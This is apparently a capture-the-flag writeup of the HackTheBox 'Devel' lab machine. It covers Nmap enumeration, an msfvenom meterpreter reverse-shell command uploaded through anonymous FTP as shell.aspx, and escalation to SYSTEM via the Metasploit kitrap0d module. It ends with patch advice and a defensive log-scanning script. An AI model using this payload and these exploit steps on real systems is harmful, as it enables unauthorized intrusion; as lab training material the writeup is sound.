---
title: "Writeup - Devel (HTB)"
date: 2022-04-06
slug: "writeup-devel-htb"
type: "writeup-ctf"
---

This is a writeup for the [Devel](https://app.hackthebox.com/machines/Devel) machine from the HackTheBox site.

## Enumeration

First, let's start with a scan of our target with the following command:

```bash
nmap -sV -T4 -Pn 10.10.10.5
```

Two TCP ports are discovered:

![](img/image-1.webp)

- 21/tcp : FTP (ftpd)
- 80/tcp : HTTP web server (Apache 2.4.41)

![](img/image-2.webp)

## Exploit

I start by checking whether it is possible to connect to FTP as `anonymous`:

![](img/image-3.webp)

In addition to being able to read, we have the ability to write, so I create a payload for a reverse shell with the following command:

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.9 LPORT=1234 -f aspx -o shell.aspx
```

I upload it, then with the help of Metasploit I launch a TCP handler to catch the meterpreter session.

![](img/image-4.webp)

I then access my previously uploaded payload at the following address:

```
http://10.10.10.5/shell.aspx
```

I now have a reverse shell on the machine.

## Privilege escalation

I background the meterpreter session with CTRL+Z. Then, to identify candidate exploits, I use the following Metasploit module:

```bash
use post/multi/recon/local_exploit_suggester
set SESSION 19
exploit
```

The module finds a number of potential exploits.

![](img/image-5.webp)

I start by testing the first one:

```bash
use windows/local/bypassuac_eventvwr
set SESSION 19
exploit
```

![](img/image-6.webp)

But without success. I test the second one:

```bash
use windows/local/ms10_015_kitrap0d
set SESSION 19
exploit
```

![](img/image-7.webp)

This one worked; I now have a reverse shell with `NT AUTHORITY\SYSTEM` privileges. The module `MS10_015` corresponds to CVE-2010-0232:

> [...] when access to 16-bit applications is enabled on a 32-bit x86 platform, does not properly validate certain BIOS calls, which allows local users to gain privileges [...]

[VK9 Security](https://vk9-sec.com/kitrap0d-windows-kernel-could-allow-elevation-of-privilege-ms10-015-cve-2010-0232/)

I can now retrieve both flags.

![](img/image-8.webp)

## Recommendations

To patch this host, I think the following actions would be necessary:

- Disable writing to the FTP server as `anonymous`
- Update Windows to patch CVE-2010-0232
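The first recommendation is about the anonymous FTP write that made the initial foothold possible. As an added example that is not part of the original writeup, the script below shows how a defender could spot that exact pattern in IIS FTP W3C logs: a successful `STOR` by the `anonymous` user that drops a file the web server would execute (here `.aspx`, since the FTP root doubles as the web root). The log lines are constructed for this example, the set of fields on the `#Fields:` line is assumed and may differ from a real deployment's logging configuration, and the extension list is an assumption about what the web root executes.

```python
"""Flag anonymous FTP uploads of web-executable files in IIS FTP W3C logs.

Added example for this writeup (not code from the original post). The
sample log below is constructed; the #Fields: layout is assumed and must
be matched to the real logging configuration before use.
"""
import os
from dataclasses import dataclass

# Extensions the web server would execute rather than serve as plain data.
# Assumption: the FTP root is also the web root, as in this writeup.
WEB_EXEC_EXTENSIONS = {".aspx", ".asp", ".ashx", ".asmx", ".config"}

# Constructed sample log (not captured from the machine).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status
2022-04-06 10:01:02 10.10.14.9 - 10.10.10.5 21 USER anonymous 331
2022-04-06 10:01:02 10.10.14.9 anonymous 10.10.10.5 21 PASS *** 230
2022-04-06 10:01:05 10.10.14.9 anonymous 10.10.10.5 21 RETR /iisstart.htm 226
2022-04-06 10:02:10 10.10.14.9 anonymous 10.10.10.5 21 STOR /shell.aspx 226
2022-04-06 10:03:00 10.10.14.9 anonymous 10.10.10.5 21 STOR /notes.txt 226
2022-04-06 10:05:00 10.10.14.20 webadmin 10.10.10.5 21 STOR /report.aspx 226
2022-04-06 10:06:00 10.10.14.9 anonymous 10.10.10.5 21 STOR /blocked.aspx 550
"""


@dataclass
class Finding:
    timestamp: str
    client_ip: str
    path: str
    status: str


def is_web_executable(path: str) -> bool:
    """True when the file's extension would be executed by the web server."""
    return os.path.splitext(path)[1].lower() in WEB_EXEC_EXTENSIONS


def parse_w3c(log_text: str):
    """Yield one dict per record, keyed by the names on the #Fields: line."""
    fields = None
    for raw in log_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if line.startswith("#") or fields is None:
            continue  # other directives, or data before any #Fields: header
        cols = line.split()
        if len(cols) < len(fields):
            continue  # truncated record; do not guess at the missing columns
        yield dict(zip(fields, cols))


def find_anonymous_web_uploads(log_text: str) -> list:
    """Return completed STOR operations by the anonymous user that wrote a
    web-executable file. A 2xx sc-status means the transfer completed; a
    denied attempt (5xx) is not a finding, which is what the log looks
    like once anonymous write access has been removed."""
    findings = []
    for rec in parse_w3c(log_text):
        if rec.get("cs-method") != "STOR":
            continue
        if rec.get("cs-username", "").lower() != "anonymous":
            continue
        if not rec.get("sc-status", "").startswith("2"):
            continue
        if is_web_executable(rec.get("cs-uri-stem", "")):
            findings.append(Finding(f"{rec['date']} {rec['time']}",
                                    rec["c-ip"], rec["cs-uri-stem"],
                                    rec["sc-status"]))
    return findings


if __name__ == "__main__":
    for f in find_anonymous_web_uploads(SAMPLE_LOG):
        print(f"ALERT {f.timestamp} {f.client_ip} uploaded {f.path} "
              f"(status {f.status})")
```

On the constructed sample only the `/shell.aspx` upload is reported: the `.txt` upload is not web-executable, the `.aspx` upload by an authenticated account is out of scope for this rule, and the 550 line is a rejected attempt rather than a successful write. The rule is deliberately narrow; a broader version would alert on any anonymous `STOR` at all, which is the state the first recommendation aims for.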